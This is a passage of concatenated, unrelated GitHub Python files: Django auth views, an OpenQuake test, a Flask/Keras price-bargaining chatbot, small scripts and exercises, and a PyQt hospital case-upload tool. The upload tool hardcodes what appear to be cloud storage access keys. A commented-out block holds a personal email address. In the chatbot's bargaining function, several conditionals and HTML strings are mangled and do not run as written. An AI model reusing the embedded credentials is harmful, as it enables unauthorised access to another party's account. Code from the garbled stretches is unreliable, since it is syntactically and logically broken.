Signal(providing_args=['sender', 'request', 'user'])\n\n\ndef index(request):\n    track_event(request, 'index_page_visited')\n    return redirect(reverse('profile'), permanent=False)\n\n\ndef profile(request):\n    track_event(request, 'profile_page_visited')\n    alerts = Alerts()\n    if not request.user.is_authenticated():\n        alerts.warning(_(\"Your collected qrcodes might be lost in the near future if you\"\n                         \" don't register to have them saved on the website\"))\n    return TemplateResponse(request, 'registration/profile.html', {\n        'widgets': profile_widgets(request),\n        'alerts': alerts.build(),\n    })\n\n\ndef login(request, *args, **kwargs):\n    track_event(request, 'login_page_visited')\n    response = auth.login(request, *args, **kwargs)\n    if request.method == 'POST':\n        if request.user.is_authenticated():\n            track_event(request, 'login_success')\n        else:\n            track_event(request, 'login_failed')\n    return response\n\n\ndef logout(request, *args, **kwargs):\n    track_event(request, 'logout_page_visited')\n    response = auth.logout(request, *args, **kwargs)\n    return response\n\n@transaction.atomic\ndef register(request):\n    if request.user.is_authenticated():\n        return redirect(reverse('index'))\n\n    if request.method == 'POST':\n        form = RegistrationForm(request.POST)\n        track_event(request, 'register_attempt')\n        if form.is_valid():\n            username = form.cleaned_data['username']\n            email = form.cleaned_data['email']\n            password = form.cleaned_data['password']\n            user = User.objects.create_user(username,\n                                            email,\n                                            password)\n            user.save()\n\n            user = authenticate(username=username, password=password)\n            auth_login(request, user)\n\n            track_event(request, 'register_success', username=username, email=email)\n            registration_successful.send(sender=register, request=request, user=user)\n\n            if 'next' in request.GET:\n                next = request.GET['next']\n            else:\n                next = reverse('index')\n            return redirect(next)\n\n    else:\n        track_event(request, 'register_page_visited')\n        form = RegistrationForm()\n    return TemplateResponse(request, 'registration/register.html',\n                            {'form': form}\n                            )\n","repo_name":"ritave/qrtrack","sub_path":"qrtrack/core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3091,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"79"} +{"seq_id":"8689137851","text":"import os\nimport 
tempfile\nimport unittest\nimport numpy\nfrom openquake.baselib import hdf5, python3compat\nfrom openquake.hazardlib.source.multi_fault import MultiFaultSource\nfrom openquake.hazardlib.geo.surface import KiteSurface\nfrom openquake.hazardlib.tests.geo.surface import kite_fault_test as kst\nfrom openquake.hazardlib.sourcewriter import write_source_model\nfrom openquake.hazardlib.sourceconverter import SourceGroup\nfrom openquake.hazardlib.nrml import SourceModel\n\nBASE_DATA_PATH = os.path.join(os.path.dirname(__file__), 'data')\n\n\nclass MultiFaultTestCase(unittest.TestCase):\n    \"\"\"\n    Test the construction of multi-fault ruptures\n    \"\"\"\n    def setUp(self):\n\n        hsmpl = 4\n        vsmpl = 2\n        idl = False\n        alg = False\n\n        # Create the surface of each section\n        path = os.path.join(BASE_DATA_PATH, 'profiles00')\n        prf, _ = kst._read_profiles(path)\n        sfc_a = KiteSurface.from_profiles(prf, vsmpl, hsmpl, idl, alg)\n\n        path = os.path.join(BASE_DATA_PATH, 'profiles01')\n        prf, _ = kst._read_profiles(path)\n        sfc_b = KiteSurface.from_profiles(prf, vsmpl, hsmpl, idl, alg)\n\n        path = os.path.join(BASE_DATA_PATH, 'profiles02')\n        prf, _ = kst._read_profiles(path)\n        sfc_c = KiteSurface.from_profiles(prf, vsmpl, hsmpl, idl, alg)\n\n        # Sections list\n        sections = [sfc_a, sfc_b, sfc_c]\n\n        # Rupture indexes\n        rup_idxs = [[0], [1], [2], [0, 1], [0, 2],\n                    [1, 2], [0, 1, 2]]\n\n        # Magnitudes\n        rup_mags = [5.8, 5.8, 5.8, 6.2, 6.2, 6.2, 6.5]\n        rakes = [90.0, 90.0, 90.0, 90.0, 90.0, 90.0, 90.0]\n\n        # Probabilities of occurrence\n        pmfs = [[0.90, 0.10],\n                [0.90, 0.10],\n                [0.90, 0.10],\n                [0.90, 0.10],\n                [0.90, 0.10],\n                [0.90, 0.10],\n                [0.90, 0.10]]\n        self.sections = sections\n        self.rup_idxs = rup_idxs\n        self.pmfs = pmfs\n        self.mags = numpy.array(rup_mags)\n        self.rakes = rakes\n\n    def test01(self):\n        # test instantiation\n        src = MultiFaultSource(\"01\", \"test\", \"Moon Crust\",\n                               self.rup_idxs, self.pmfs, self.mags, self.rakes)\n        src.set_sections(self.sections)\n        src.mutex_weight = 1.\n\n        # test conversion to XML\n        smodel = SourceModel([SourceGroup(\"Moon Crust\", [src], \"test_group\",\n                                          src_interdep='mutex')])\n        fd, tmp = tempfile.mkstemp(suffix='.xml')\n        with os.fdopen(fd, 'wb'):\n            sm_xml, gm_hdf5, gm_xml = write_source_model(tmp, smodel)\n        # check the stored section indices\n        with hdf5.File(gm_hdf5, 'r') as f:\n            lines = python3compat.decode(f['01/rupture_idxs'][:])\n        self.assertEqual(lines, ['0', '1', '2', '0 1', '0 2', '1 2', '0 1 2'])\n\n        # test rupture generation\n        rups = list(src.iter_ruptures())\n        self.assertEqual(7, len(rups))\n\n    def test02(self):\n        # test set_sections, 3 is not a known section ID\n        rup_idxs = [[0], [1], [3], [0], [1], [3], [0]]\n        mfs = MultiFaultSource(\"01\", \"test\", \"Moon Crust\", rup_idxs,\n                               self.pmfs, self.mags, self.rakes)\n        with self.assertRaises(IndexError) as ctx:\n            mfs.set_sections(self.sections)\n        expected = 'list index out of range'\n        self.assertEqual(expected, str(ctx.exception))\n","repo_name":"gem/oq-engine","sub_path":"openquake/hazardlib/tests/source/multi_fault_test.py","file_name":"multi_fault_test.py","file_ext":"py","file_size_in_byte":3454,"program_lang":"python","lang":"en","doc_type":"code","stars":338,"dataset":"github-code","pt":"79"} +{"seq_id":"33698581732","text":"import sys\nimport os.path\nimport argparse\n\nimport logging\n\n\ndef main():\n    parser = argparse.ArgumentParser(description='report environments')\n    parser.add_argument('-v', '--verbose',\n                        action='store_true',\n                        default=False)\n    parser.add_argument('-d', '--debug',\n                        action='store_true',\n                        
default=False)\n    args = parser.parse_args()\n    verbose = args.verbose\n    if args.debug:\n        logging.basicConfig(level=logging.DEBUG)\n    else:\n        logging.basicConfig(level=logging.WARNING)\n\n    # display the environment variables\n    for k, v in os.environ.items():\n        print(\"{key} : {value}\".format(key=k, value=v))\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"ProteinDF/ProteinDF_pytools","sub_path":"scripts/pdf-env.py","file_name":"pdf-env.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"42471957547","text":"from flask import Flask, render_template, flash, redirect, url_for, session, request, logging\nfrom flask_mysqldb import MySQL\nimport nltk\nfrom nltk.stem.lancaster import LancasterStemmer\nstemmer = LancasterStemmer()\nimport json\nimport numpy as np\nimport random\nimport tensorflow as tf\nimport keras\nimport pickle\nimport os\nfrom engine import get_recommendations\nimport pandas as pd\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Activation, Dropout\nfrom keras.optimizers import SGD\n\napp = Flask(__name__)\n\n\n# Config MySQL\nmysql = MySQL()\napp.config['MYSQL_HOST'] = '127.0.0.1'\napp.config['MYSQL_USER'] = 'root'\napp.config['MYSQL_PASSWORD'] = ''\napp.config['MYSQL_DB'] = 'botto'\napp.config['MYSQL_CURSORCLASS'] = 'DictCursor'\n\n# Initialize the app for use with this MySQL class\nmysql.init_app(app)\n\n\n# Chat\nwith open('intents.json') as json_data:\n    intents = json.load(json_data)\n\ndata = pickle.load( open( \"data.pickle\", \"rb\" ) )\nwords = data['words']\nclasses = data['classes']\n\ndef clean_up_sentence(sentence):\n    # tokenize the pattern\n    sentence_words = nltk.word_tokenize(sentence)\n    # stem each word\n    sentence_words = [stemmer.stem(word.lower()) for word in sentence_words]\n    return sentence_words\n\n# return bag of words array: 0 or 1 for each word in the bag that exists in the sentence\ndef bow(sentence, words):\n    # tokenize the pattern\n    sentence_words = clean_up_sentence(sentence)\n    # bag of words\n    bag = [0]*len(words)\n    for s in sentence_words:\n        for i,w in enumerate(words):\n            if w == s:\n                bag[i] = 1\n\n    return(np.array(bag))\n\n\nmodel = keras.models.load_model(\"model.pkl\")\n\n# Bargain\n\nclass Stack:\n    def __init__(self):\n        self.items = []\n\n    def isEmpty(self):\n        return self.items == []\n\n    def push(self, item):\n        self.items.append(item)\n\n    def pop(self):\n        return self.items.pop()\n\n    def top(self):\n        return self.items[len(self.items)-1]\n    def prev(self):\n        return self.items[len(self.items)-2]\n    def next(self):\n        return self.items[len(self.items)-3]\n\n    def size(self):\n        return len(self.items)\nuserStack = Stack()\nbotStack = Stack()\n\n\n\n@app.route('/')\ndef fn():\n    return render_template('landingpage.html')\n\n@app.route('/allproducts')\ndef index():\n\n    # Create cursor\n    cur = mysql.connection.cursor()\n    # Get message\n    cur.execute(\"SELECT * FROM products ORDER BY id DESC \")\n    allproduct = cur.fetchall()\n\n    # Close Connection\n    cur.close()\n    return render_template('allproducts.html', allproducts=allproduct)\n\n@app.route('/<name>', methods=['GET', 'POST'])\ndef cars(name):\n    global flag\n    flag=0\n    for j in range(0,userStack.size()):\n        userStack.pop()\n    for k in range(0,botStack.size()):\n        botStack.pop()\n\n    # Create cursor\n    cur = mysql.connection.cursor()\n    # Get message\n    values = name\n    
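# a parameterized query (the %s placeholder) lets the MySQL driver escape the brand value safely\n    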
cur.execute(\"SELECT * FROM products WHERE brand=%s ORDER BY id ASC\", (values,))\n products = cur.fetchall()\n # Close Connection\n cur.close()\n\n if 'view' in request.args:\n product_id = request.args['view']\n curso = mysql.connection.cursor()\n curso.execute(\"SELECT * FROM products WHERE id=%s\", (product_id,))\n q = curso.fetchall()\n for row in q:\n global p_name\n p_name=row['pName']\n global price\n price=row['price']\n global mini\n mini=row['mini']\n userStack.push(price) \n global quantity\n quantity=0\n return render_template('view_product.html', details=q)\n \n else:\n return render_template('products.html', toys=products, values=name)\n\n\n@app.route(\"/get\")\ndef chat():\n userText = request.args.get('msg')\n res=0\n global mini\n global quantity\n global flag\n global discount\n global price\n global p_name\n global accepedPrice\n \n while True:\n for i in userText.split():\n if i.isdigit():\n res = i\n\n for i in userText.split():\n if i==\"accept\":\n return \"congrats on your deal. I will email you the link to purchase. \"\n elif i==\"reject\":\n randomresponse1 = [\"I understand. What do you offer, then?\",\"What could make it work, then?\",\"Fair enough, what's your counter offer\",\"Ok, what’s your counter offer?\",\"Hit me with your best shot!\",\"Make me an offer I can’t refuse!\" ]\n return random.choice(randomresponse1)\n\n if res == 0:\n input_data = pd.DataFrame([bow(userText, words)], dtype=float, index=['input'])\n results = model.predict([input_data])[0]\n results_index = np.argmax(results)\n tag = classes[results_index]\n\n if results[results_index] > 0.5:\n \n for tg in intents[\"intents\"]:\n if tg['tag'] == tag:\n responses = tg['responses']\n \n responce= random.choice(responses)\n return responce\n else:\n return(\"i didn't understand. try something else. \")\n\n elif quantity==0:\n if int(res) < 10 and int(res)>0:\n quantity=int(res)\n if quantity <= 1:\n discount = 7\n elif quantity==2:\n discount = 9\n else:\n discount = 10\n nextOffer = price-(price * (discount/100))\n botStack.push(nextOffer) \n\n return \"How much are you willing to offer per unit ?\" \n else:\n return \"Please enter a quantity \"\n \n else:\n hisOffer = int(res)\n if(flag == 0):\n \n\n if(hisOffer1) & (hisOfferbotStack.top()):\n userStack.push(hisOffer)\n accepedPrice= hisOffer\n return \"Congrats! We have a deal. I will email you the link to purchase. \"\n\n else:\n userStack.push(hisOffer)\n discount = discount + 3\n botStack.push(price-(price * (discount/100)))\n if(hisOffer>botStack.top()):\n return \"Congrats! We have a deal. I will email you the link to purchase. \"\n flag=1\n counterOffer=\"Sorry, I can’t accept that deal. We’ve been bargaining for a while and I can see that you are a tough negotiator. So here's my final offer of \" + str(botStack.top()) +\"\"\n somehtml='
'\n return '{} {}'.format(counterOffer, somehtml)\n\n\n elif(flag==1):\n if(hisOffer>botStack.top()):\n return \"Congrats! We have a deal. I will email you the link to purchase. \"\n #email()\n result_final = get_recommendations(p_name)\n names = []\n pictures = []\n ids = []\n brands=[]\n prices = []\n for i in range(len(result_final)):\n if result_final.iloc[i][4] '+'
'+names[m] +'

Rs '+str(prices[m]) +'

'\n cards+=card \n someHtml='
'+cards +'
'\n resp=\"That was my last offer, however you could check out these similar products in your budget\"\n \n return '{} {}'.format(resp, someHtml) \n\n''' \ndef email():\n message = Mail(\n from_email='Botto@toycars.com',\n to_emails='julianathayil@gmail.com',\n subject='Heres my final offer',\n html_content='

Still thinking about it?

Here is my final offer


Subaru Impreza 22B STi

Offer price = Rs 513

')\n try:\n sg = SendGridAPIClient(os.environ.get('SENDGRID_API_KEY'))\n response = sg.send(message)\n print(response.status_code)\n except Exception as e:\n print(str(e))\n'''\n \nif __name__ == \"__main__\":\n app.run()\n global flag\n global discount\n global p_name\n global quantity\n global price\n global accepedPrice\n global mini","repo_name":"JulianaThayil/Keras-ecommerce-Chatbot","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":12194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"6465223478","text":"import sys\n\nfrom matplotlib import pyplot as plt\nimport pandas as pd\nimport numpy as np\n\ndf = pd.read_csv(f'results.csv', header=None, names=['CPUs', 'N', 'd', 'time [s]'])\n\n# Acceleration\nfor d in np.unique(df['d']):\n df_d = df[df['d'] == d]\n \n cpus = df_d['CPUs'].values\n times = df_d['time [s]'].values\n \n accel = times[0] / times\n \n plt.plot(cpus, accel, marker='.', label=f'd={d}')\n\nplt.title(f'Acceleration for different d')\nplt.xlabel('CPUs')\nplt.ylabel('Acceleration (S(P) = T(1) / T(P))')\nplt.legend()\nplt.grid()\nplt.tight_layout()\n\nplt.savefig(f'plots/acceleration.png')\nplt.close() \n\n# Efficiency\nfor d in np.unique(df['d']):\n df_d = df[df['d'] == d]\n \n cpus = df_d['CPUs'].values\n times = df_d['time [s]'].values\n \n accel = times[0] / times\n eff = accel / cpus\n \n plt.plot(cpus, eff, marker='.', label=f'd={d}')\n\nplt.title(f'Efficiency for different d')\nplt.xlabel('CPUs')\nplt.ylabel('Efficiency (E(P) = S(P) / P)')\nplt.legend()\nplt.grid()\nplt.tight_layout()\n\nplt.savefig(f'plots/efficiency.png')\nplt.close() \n\n# Serial fraction\nfor d in np.unique(df['d']):\n df_d = df[df['d'] == d]\n \n cpus = df_d['CPUs'].values\n times = df_d['time [s]'].values\n \n accel = times[0] / times\n # sf = (1 / accel - 1 / cpus) / (1 - 1 / cpus)\n sf = (1 / accel - 1 / cpus)\n sf /= (1 - 1 / cpus)\n \n plt.plot(cpus, sf, marker='.', label=f'd={d}')\n\nplt.title(f'Serial fraction for different d')\nplt.xlabel('CPUs')\nplt.ylabel('Serial fraction (f(P) = [1/S(p) - 1/p] / [1 - 1/p])')\nplt.legend()\nplt.grid()\nplt.ylim(0, 0.2)\nplt.tight_layout()\n\nplt.savefig(f'plots/serial_fraction.png')\nplt.close() \n","repo_name":"MatiXOfficial/parallel-algorithms","sub_path":"lab6/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"16697117204","text":"#Part1 Siyan Huo bm21725@bristol.ac.uk\n\n'''\ndefine the Board class\n'''\n\n#CLASS1\nclass Board:\n #Defining basic properties\n def __init__(self,size,PlayerNumber):\n self.size=size\n self.PlayerNumber=PlayerNumber\n \n #Game instructions\n def md(self):\n print('Hello! Welcome!')\n print('The number 8 represents the wall,')\n print('the numbers 1 and 2 represent the two players, ')\n print('the number 0 represents the place that can be walked,')\n print('and the number 4 represents the place that cannot be walked because it has already been walked.')\n print('=======How to manage it?==========')\n print('The two players are moving in turns on a grid board that is surrounded by walls. ')\n print('A player can move in four directions (up, down, left, right). 
')\n print('NOTE:Enter uppercase letters U,D,L, and R.')\n print('As a player moves, it leaves a trail on the spaces it has traversed, which acts as a wall.')\n print('The game ends if at least one player crashes into the wall, another player or previously visited cell. ')\n print('The player who survives the longest win. ')\n \n #the default board \n def bd(self):\n #Define an empty list\n a1=[]\n # Generates nested lists in empty lists\n for i in range(self.size):\n a1.append([])\n for j in range(self.size):\n a1[i].append(0) \n #Player 1 is represented by the number 1\n a1[1][1]=1\n #Player 2 is represented by the number 2\n a1[self.size-2][self.size-2]=2\n #Build a wall, representing the wall with the number 8\n for k in range(self.size):\n a1[k][0]=8\n a1[k][self.size-1]=8\n for f in range(self.size):\n a1[0][f]=8\n a1[self.size-1][f]=8\n #For aesthetics, traverse the list to print\n for g in range(self.size):\n print(a1[g])\n return a1\n \n #show there are how many players\n def pi(self):\n print('There are '+str(self.PlayerNumber)+' players totally.')\n","repo_name":"Siyanho/project","sub_path":"board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":2130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"71623533374","text":"inputString = [\"M\", \"r\", \" \", \"J\", \"o\", \"h\", \"n\", \" \", \"S\", \"m\", \"i\", \"t\", \"h\"]\ninputlength = len(inputString)\n\n\n# string : An array of char\n# length : The true length of the string\n# create another empty array to store!\n\nclass Solution:\n def replaceBlank(self, string, length):\n # output_string\n output_array = []\n shift = 0\n for i in range(length):\n if string[i] == \" \":\n output_array.append('%')\n output_array.append('2')\n output_array.append('0')\n shift += 2\n else:\n output_array.append(string[i])\n\n output_len = length + shift\n return output_array, output_len\n\n\n# print(inputString)\n\nsolution = Solution()\n\nprint(solution.replaceBlank(inputString, inputlength))\n\n#\n# extralen = 0\n# for i in range(inputlength):\n# if inputString[i] == \" \":\n# print(i)\n# for j in range(i, inputlength):\n#\n# inputString[i] = \"%\"\n# inputString[i + 1] = \"2\"\n# inputString[i + 2] = \"0\"\n# extralen += 2\n#\n# inputlength += extralen\n# print(inputString)\n# print(inputlength)\n","repo_name":"beckhong/PythonLearning-DataStructureLearning","sub_path":"CodePractice/lintCode/easy/212_spaceReplacement.py","file_name":"212_spaceReplacement.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"14117488069","text":"# 가사 검색\n# https://programmers.co.kr/learn/courses/30/lessons/60060\n\nfrom bisect import bisect_left\nfrom bisect import bisect_right\nfrom copy import deepcopy\n\ndef solution(words, queries):\n answer = []\n words_reversed = [ word[::-1] for word in words ]\n\n words.sort()\n # words_reversed.sort(reverse=True)\n words_reversed.sort()\n\n words_by_len = [ [] for _ in range(10001) ]\n words_reversed_by_len = [ [] for _ in range(10001) ]\n\n for word in words:\n words_by_len[ len(word) ].append(word)\n for word in words_reversed:\n words_reversed_by_len[ len(word) ].append(word)\n\n for query in queries:\n\n if query[0] == '?': # '?'가 왼쪽에 위차한 경우 뒤집어진 word와 비교\n l = bisect_left(words_reversed_by_len[len(query)], query[::-1].replace('?', 'a'))\n r = bisect_right(words_reversed_by_len[len(query)], query[::-1].replace('?', 'z'))\n else: # '?'가 
오른쪽에 위치한 경우 정방향 word와 비교\n l = bisect_left(words_by_len[len(query)], query.replace('?', 'a'))\n r = bisect_right(words_by_len[len(query)], query.replace('?', 'z'))\n\n answer.append(r-l)\n \n return answer\n\nwords = [\"frodo\", \"front\", \"frost\", \"frozen\", \"frame\", \"kakao\"]\nqueries = [\"fro??\", \"????o\", \"fr???\", \"fro???\", \"pro?\"]\nprint( solution(words, queries) )\n","repo_name":"DojinPark/algorithms","sub_path":"이것이코딩테스트다_나동빈/ch15prob30.py","file_name":"ch15prob30.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"21911639334","text":"# -*- coding: utf-8 -*-\n\"\"\"\nModule implementing MainWindow.\n\"\"\"\nimport win32serviceutil\nimport win32service\nimport win32event\nimport winerror\nimport servicemanager\nimport logging\nimport os\nimport inspect\nimport time\nimport sys\nfrom PyQt5.QtCore import pyqtSlot,QDateTime,QTime\nfrom PyQt5.QtWidgets import QMainWindow\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtWidgets import QMessageBox,QFileDialog,QDesktopWidget\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtGui import QIcon\n# from Ui_upload import Ui_MainWindow\nimport oss2\nimport json\nimport requests\nimport codecs\nimport datetime\nimport win32timezone\nimport re\nfrom PyQt5.QtCore import QEvent\nfrom HospitalUploadProc import HospitalUploadProc,UpLoadResult,UpLoadResult_dit\nfrom Ui_upload import Ui_MainWindow\nfrom service_manager import ServiceManager\ndef_dirname ='HA003C02201812190011'\n# 重载函数,并定义信号,以便主程序处理\nKey_vaild = 3\n\nclass UploadThread(QtCore.QThread,HospitalUploadProc):\n #完成时返回的信号量\n # finishSignal = QtCore.pyqtSignal(list) # 信号\n trigger = QtCore.pyqtSignal(dict)\n def __init__(self,parent=None,op_type=None,input_array=dict):\n super(UploadThread, self).__init__(parent)\n self.working = True\n self.num = 0\n self._type= op_type\n self._arry=input_array\n self._FileCount=0\n self._UpLoadCaseCount = 0\n self._TotalCase=0\n self.local = os.path.dirname(os.path.realpath(__file__))\n\n def start_timer(self):\n self.num = 0\n self.start()\n\n def install_service(self,ServiceName,ServicePath):\n count = 0\n app = ServiceManager(ServiceName)\n self.trigger.emit({'info': '正在%s启动服务,请稍后!............'%ServiceName})\n if False == app.is_exists():\n while True:\n if count > 3:\n self.trigger.emit({'info': '%s服务安装失败' % ServiceName}) # 发送信号\n return False\n cmd = '{0} --startup auto install'.format(os.path.join(self.local, ServicePath))\n os.system(cmd)\n if True == app.is_exists():\n self.trigger.emit({'info': '%s服务安装成功'%ServiceName}) # 发送信号\n break\n time.sleep(5)\n count =count + 1\n self.trigger.emit({'info': '%s服务安装成功'%ServiceName}) # 发送信('PythonService 服务安装成功!')\n if 'RUNNING' not in str(app.status()):\n count = 0\n while True:\n if count > 5:\n self.trigger.emit({'info': '%s服务启动失败!' % ServiceName}) # 发送信号\n return False\n app.restart()\n if 'RUNNING' in str(app.status()):\n self.trigger.emit({'info': '%s服务启动成功!'%ServiceName})\n return True\n time.sleep(5)\n count = count + 1\n self.trigger.emit({'info': '%s服务启动失败,第%d次重试!' 
% (ServiceName,count)}) # 发送信号\n else:\n self.trigger.emit({'info': '%s服务已启动!'%ServiceName})\n return True\n\n def StopService(self,ServiceName):\n app = ServiceManager(ServiceName)\n self.trigger.emit({'info': '正在停止%s服务,请稍后!............'%ServiceName})\n if False == app.is_exists():\n self.trigger.emit({'info': '%s服务已停止!'%ServiceName})\n # self.trigger.emit({'status': False}) # 发送信号\n return False\n if 'STOPPING' not in str(app.status()):\n while True:\n app.stop()\n if 'STOPPED' in str(app.status()):\n self.trigger.emit({'info': '%s服务已停止!' % ServiceName})\n return True\n else:\n time.sleep(2)\n else:\n self.trigger.emit({'info': '%s服务已停止!'%ServiceName})\n return True\n\n def RemoveService(self,ServiceName,ServicePath):\n app = ServiceManager(ServiceName)\n count = 0\n if False == app.is_exists():\n self.trigger.emit({'info': '%s服务已删除!' % ServiceName})\n return True\n while True:\n if count > 5:\n self.trigger.emit({'info': '%s服务已标记为删除,请稍后再查看!' % ServiceName})\n return False\n if False == app.is_exists():\n self.trigger.emit({'info': '%s服务已删除!' % ServiceName})\n return True\n cmd = '{0} remove'.format(os.path.join(self.local, ServicePath))\n os.system(cmd)\n time.sleep(5)\n count =count + 1\n self.trigger.emit({'info': '正在删除%s服务,请稍后..........!' %ServiceName})\n\n\n def run(self):\n while self.working:\n # print(\"Working\", self.thread())\n #返回结果\n if self._type =='manuUpLoad':\n self._FileCount = self.Get_File_Nub(self._arry.get('Case_Path'))\n result = self.UpLoad_Case(self._arry.get('Pa_info'),self._arry.get('baseurl') ,self._arry.get('Case_Path') ,self._arry.get('Force_flag'))\n # self.update_text_singal.emit(\"Running time:\", '1') # 发送信号\n self.trigger.emit({'status':result})# 发送信号\n\n elif self._type =='allUpLoad':\n count = 0\n temp_count = 0\n self._FileCount = 0\n self._UpLoadCaseCount = 0\n self._TotalCase =0\n self.trigger.emit({'info': '正在统计:%s内需要上传的文件个数,请稍后!' % self._arry.get('Case_Path')}) # 发送信号\n for Key in UpLoadResult_dit.keys():\n UpLoadResult_dit[Key] = []\n for hp_temp in os.listdir(self._arry.get('Case_Path')):\n temp_path = os.path.join(self._arry.get('Case_Path'), hp_temp)\n if os.path.isdir(temp_path):\n self._FileCount = self._FileCount + self.Get_File_Nub(temp_path)\n self._TotalCase = self._TotalCase +1\n self.trigger.emit({'info': '%s内共计%d个文件需要上传!' 
% (self._arry.get('Case_Path'), self._FileCount )}) # 发送信号\n for hp_temp in os.listdir(self._arry.get('Case_Path')):\n temp_path = os.path.join(self._arry.get('Case_Path'), hp_temp)\n if os.path.isdir(temp_path):\n self.trigger.emit({'info': '正在上传CASE文件:%s,请稍后!'%temp_path}) # 发送信号\n UpLoadResult_dit[UpLoadResult.Total_Case].append(hp_temp)\n result =self.UpLoad_Case(self._arry.get('Pa_info'),self._arry.get('baseurl') ,temp_path ,self._arry.get('Force_flag'))\n if result in UpLoadResult_dit.keys():\n UpLoadResult_dit[result].append(hp_temp)\n if UpLoadResult.Proc_Ok == result:\n temp_count = temp_count+1\n count=count+1\n self.trigger.emit({'case_count': count,'total_case':self._TotalCase}) # 发送信号\n # print(UpLoadResult_dit)\n self.trigger.emit({'info':self.PraceResult(UpLoadResult_dit)}) # 发送信号\n self.trigger.emit({'status': temp_count}) # 发送信号\n\n elif self._type =='StartService':\n self.install_service('PythonService','hospital_service.exe')\n result = self.install_service('Hospital_Monitor','hospital_monitor.exe')\n self.trigger.emit({'status':result})\n\n elif self._type=='StopService':\n self.StopService('Hospital_Monitor')\n result = self.StopService('PythonService')\n self.trigger.emit({'status': result})\n\n elif self._type == 'DeleteService':\n self.RemoveService('Hospital_Monitor','hospital_monitor.exe')\n result = self.RemoveService('PythonService','hospital_service.exe')\n self.trigger.emit({'status': result})\n\n return\n ##self.signal_time.emit(\"Running time:\",'1') # 发送信号\n\nclass MainWindow(QMainWindow,Ui_MainWindow,HospitalUploadProc):\n \"\"\"\n Class documentation goes here.\n \"\"\"\n def get_dataDir(self):\n if os.path.exists(os.path.join(\"C:/\",'cfg.txt')):\n return json.loads(codecs.open(os.path.join(\"C:/\",'cfg.txt'), 'r').read()).get('pa_dir')\n else:\n return os.path.dirname(os.path.realpath(__file__))\n\n def get_setTime(self):\n if os.path.exists(os.path.join(\"C:/\", 'cfg.txt')):\n temp_time=json.loads(codecs.open(os.path.join(\"C:/\", 'cfg.txt'), 'r').read()).get('run_time')\n H = int(temp_time.split(':')[0])\n M1 = int(temp_time.split(':')[1][:1])\n M2 = int(temp_time.split(':')[1][-1:])\n self.timeEdit.setTime(QtCore.QTime(H, M1, M2))\n else:\n # 设置系统的默认运行时间\n self.timeEdit.setTime(QtCore.QTime(16, 0, 0))\n\n def Get_url(self):\n if os.path.exists(os.path.join(\"C:/\", 'cfg.txt')):\n cfg = json.loads(codecs.open(os.path.join(\"C:/\", 'cfg.txt'), 'r').read())\n if 'url' in cfg.keys():\n return cfg['url']\n return 'http://api.medical.exaai.cn'\n\n def Get_Server_Status(self):\n app = ServiceManager('PythonService')\n if False == app.is_exists():\n self.statusBar.showMessage('服务未安装!')\n return\n self.statusBar.showMessage('服务的运行状态为:%s'%app.status())\n\n def __init__(self, parent=None):\n \"\"\"\n Constructor\n @param parent reference to the parent widget\n @type QWidget\n \"\"\"\n super(MainWindow, self).__init__(parent)\n self.setupUi(self)\n self._runtTime = ''\n self.local = os.path.dirname(os.path.realpath(__file__))\n # self._dataDir = os.path.dirname(os.path.realpath(__file__))\n self._dataDir = self.get_dataDir()\n self.id ='LTAInP47aO9oWL93'\n self.key ='yRBFKapTmX0d4u95WD2jNtKdW88F4u'\n self.bucket ='exa-hospital'\n self._baseurl = self.Get_url()\n # self._baseurl ='http://www.xcmy.top'\n # self._baseurl ='http://39.96.42.137'\n # self._baseurl ='http://39.96.91.138:3000'\n self.UpLoad_Case_Nub = 0\n self.Pa_Info ='PatientInfo.txt'\n self.Pa_Info_path_arry = []\n self.Pa_Info_Current_Path =''\n self.Pa_Info_current_index =0\n self.SaveInfo={}\n 
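        # Progress counters for batch uploads; they feed the status-bar messages refreshed in update_text().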
self.CaseCount = 0\n self.File_Count = 0\n self._Flag = {\n 'allUpLoad' : False,\n 'manuUpLoad' : False,\n 'StartService': False,\n 'StopService': False,\n 'DeleteService': False,\n 'EditCase':False,\n\n }\n self.move_center()\n #禁止窗体拖动以及最小化操作\n self.setWindowFlags(QtCore.Qt.Dialog)\n self.setFixedSize(441, 484)\n self.setWindowIcon(QIcon('1.ico')) # 设置窗体标题图标\n self.get_setTime()\n self.pushButton_4.setVisible(False)\n self.pushButton_5.setVisible(False)\n self.groupBox_4.setVisible(False)\n self.radioButton_2.setChecked(True)\n # MainWindow.setWindowFlags(QtCore.Qt.WindowCloseButtonHint)\n self.textBrowser.append('案例路径为:'+self._dataDir)\n self.textBrowser.append('URL:' + self._baseurl)\n ##设置系统的默认运行时间\n #self.timeEdit.setTime(QtCore.QTime(15,0,0))\n self.Get_Server_Status()\n self.progressBar.setVisible(False)\n # '3 5 6 15 20 0'\n self.lineEdit_5.installEventFilter(self)\n self.lineEdit_3.installEventFilter(self)\n self.lineEdit_6.installEventFilter(self)\n self.lineEdit.installEventFilter(self)\n self.lineEdit_15.installEventFilter(self)\n self.lineEdit_20.installEventFilter(self)\n self.lineEdit_24.installEventFilter(self)\n self.lineEdit_7.installEventFilter(self)\n self.timeEdit.setEnabled(False)\n self.textBrowser.append(self.ReadResultInfo(os.path.join('C:/','uploadinfo')))\n\n def 